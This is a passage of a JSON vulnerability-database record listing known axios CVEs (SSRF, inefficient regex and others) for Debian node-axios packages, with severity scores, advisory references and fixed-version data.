g:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2023-45857","GHSA-wf5p-g6vw-rhxx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7rdk-mw2k-eqdx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15996?format=json","vulnerability_id":"VCID-epu9-wdt3-kbay","summary":"Server-Side Request Forgery in axios\naxios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-39338.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-39338.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-39338","reference_id":"","reference_type":"","scores":[{"value":"0.02141","scoring_system":"epss","scoring_elements":"0.84295","published_at":"2026-05-05T12:55:00Z"},{"value":"0.02141","scoring_system":"epss","scoring_elements":"0.84277","published_at":"2026-04-29T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86309","published_at":"2026-04-21T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86315","published_at":"2026-04-18T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86311","published_at":"2026-04-16T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86295","published_at":"2026-04-13T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86298","published_at":"2026-04-12T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86301","published_at":"2026-04-11T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86286","published_at":"2026-04-0
9T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86276","published_at":"2026-04-08T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86257","published_at":"2026-04-07T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86238","published_at":"2026-04-02T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86256","published_at":"2026-04-04T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86337","published_at":"2026-04-26T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86327","published_at":"2026-04-24T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-39338"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/6b6b605eaf73852fb2dae033f1e786155959de3a","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/6b6b605eaf73852fb2dae033f1e786155959de3a"},{"reference_url":"https://github.com/axios/axios/issues/6463","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/issues/6463"},{"reference_url":"https://github.com/axios/axios/pull/6539","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements
":""}],"url":"https://github.com/axios/axios/pull/6539"},{"reference_url":"https://github.com/axios/axios/pull/6543","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6543"},{"reference_url":"https://github.com/axios/axios/releases","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T19:24:57Z/"}],"url":"https://github.com/axios/axios/releases"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.7.4","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v1.7.4"},{"reference_url":"https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T19:24:57Z/"}],"url":"https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39338","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39338"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1078878","reference_id":"1078878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1078878"},{"reference_url":"https://bugzilla.redhat.c
om/show_bug.cgi?id=2304369","reference_id":"2304369","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2304369"},{"reference_url":"https://github.com/advisories/GHSA-8hc4-vh64-cxmj","reference_id":"GHSA-8hc4-vh64-cxmj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8hc4-vh64-cxmj"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6209","reference_id":"RHSA-2024:6209","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6209"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6210","reference_id":"RHSA-2024:6210","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6210"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6211","reference_id":"RHSA-2024:6211","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6211"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6667","reference_id":"RHSA-2024:6667","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6667"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8014","reference_id":"RHSA-2024:8014","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8014"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8023","reference_id":"RHSA-2024:8023","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8023"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8981","reference_id":"RHSA-2024:8981","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8981"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932087?format=json","purl":"pkg:deb/debian/node-axios@0?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/
node-axios@0%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932081?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vkx-cwua-rqe4"},{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bf
bt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932088?format=json","purl":"pkg:deb/debian/node-axios@1.7.4%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.7.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_
vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2024-39338","GHSA-8hc4-vh64-cxmj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-epu9-wdt3-kbay"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11158?format=json","vulnerability_id":"VCID-n89f-3nkb-ebg3","summary":"Incorrect Comparison\naxios is vulnerable to Inefficient Regular Expression 
Complexity","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3749.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3749.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3749","reference_id":"","reference_type":"","scores":[{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92213","published_at":"2026-04-04T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92237","published_at":"2026-04-12T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92231","published_at":"2026-04-09T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92228","published_at":"2026-04-08T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92216","published_at":"2026-04-07T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92207","published_at":"2026-04-02T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.922","published_at":"2026-04-01T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92245","published_at":"2026-04-18T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92246","published_at":"2026-04-16T12:55:00Z"},{"value":"0.08262","scoring_system":"epss","scoring_elements":"0.92234","published_at":"2026-04-13T12:55:00Z"},{"value":"0.08468","scoring_system":"epss","scoring_elements":"0.9237","published_at":"2026-04-29T12:55:00Z"},{"value":"0.08468","scoring_system":"epss","scoring_elements":"0.92376","published_at":"2026-04-26T12:55:00Z"},{"value":"0.08468","scoring_system":"epss","scoring_elements":"0.92375","published_at":"2026-04-24T12:55:00Z"},{"value":"0.08468","scoring_system":"epss","scoring_elements":"0.92371","published_
at":"2026-04-21T12:55:00Z"},{"value":"0.08894","scoring_system":"epss","scoring_elements":"0.92589","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3749"},{"reference_url":"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3749","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3749"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929"},{"reference_url":"https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31"},{"reference_url":"https://lists.apache.org/thread.html/r075d464dce95cd13c03ff938
4658edcccd5ab2983b82bfc72b62bb10@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r075d464dce95cd13c03ff9384658edcccd5ab2983b82bfc72b62bb10@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r216f0fd0a3833856d6a6a1fada488cadba45f447d87010024328ccf2@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r216f0fd0a3833856d6a6a1fada488cadba45f447d87010024328ccf2@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r3ae6d2654f92c5851bdb73b35e96b0e4e3da39f28ac7a1b15ae3aab8@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r3ae6d2654f92c5851bdb73b35e96b0e4e3da39f28ac7a1b15ae3aab8@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r4bf1b32983f50be00f9752214c1b53738b621be1c2b0dbd68c7f2391@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r4bf1b32983f50be00f9752214c1b53738b621be1c2b0dbd68c7f2391@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://li
sts.apache.org/thread.html/r7324ecc35b8027a51cb6ed629490fcd3b2d7cf01c424746ed5744bf1@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r7324ecc35b8027a51cb6ed629490fcd3b2d7cf01c424746ed5744bf1@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r74d0b359408fff31f87445261f0ee13bdfcac7d66f6b8e846face321@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r74d0b359408fff31f87445261f0ee13bdfcac7d66f6b8e846face321@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/ra15d63c54dc6474b29f72ae4324bcb03038758545b3ab800845de7a1@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/ra15d63c54dc6474b29f72ae4324bcb03038758545b3ab800845de7a1@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/rc263bfc5b53afcb7e849605478d73f5556eb0c00d1f912084e407289@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/rc263bfc5b53afcb7e849605478d73f5556eb0c00d1f912084e407289@%3Ccommit
s.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/rfa094029c959da0f7c8cd7dc9c4e59d21b03457bf0cedf6c93e1bb0a@%3Cdev.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/rfa094029c959da0f7c8cd7dc9c4e59d21b03457bf0cedf6c93e1bb0a@%3Cdev.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/rfc5c478053ff808671aef170f3d9fc9d05cc1fab8fb64431edc66103@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/rfc5c478053ff808671aef170f3d9fc9d05cc1fab8fb64431edc66103@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://www.npmjs.com/package/axios","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/package/axios"},{"reference_url":"https://www.oracle.com/security-alerts/cpujul2022.html","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1999784","reference_id":"1999784","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1999784"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3749"
,"reference_id":"CVE-2021-3749","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3749"},{"reference_url":"https://github.com/advisories/GHSA-cph5-m8f7-6c5x","reference_id":"GHSA-cph5-m8f7-6c5x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cph5-m8f7-6c5x"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3694","reference_id":"RHSA-2021:3694","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3694"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4902","reference_id":"RHSA-2021:4902","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4902"},{"reference_url":"https://access.redhat.com/errata/RHSA-2022:0056","reference_id":"RHSA-2022:0056","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2022:0056"},{"reference_url":"https://access.redhat.com/errata/RHSA-2022:1276","reference_id":"RHSA-2022:1276","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2022:1276"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932081?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vkx-cwua-rqe4"},{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"V
CID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932085?format=json","purl":"pkg:deb/debian/node-axios@0.21.3%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.3%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%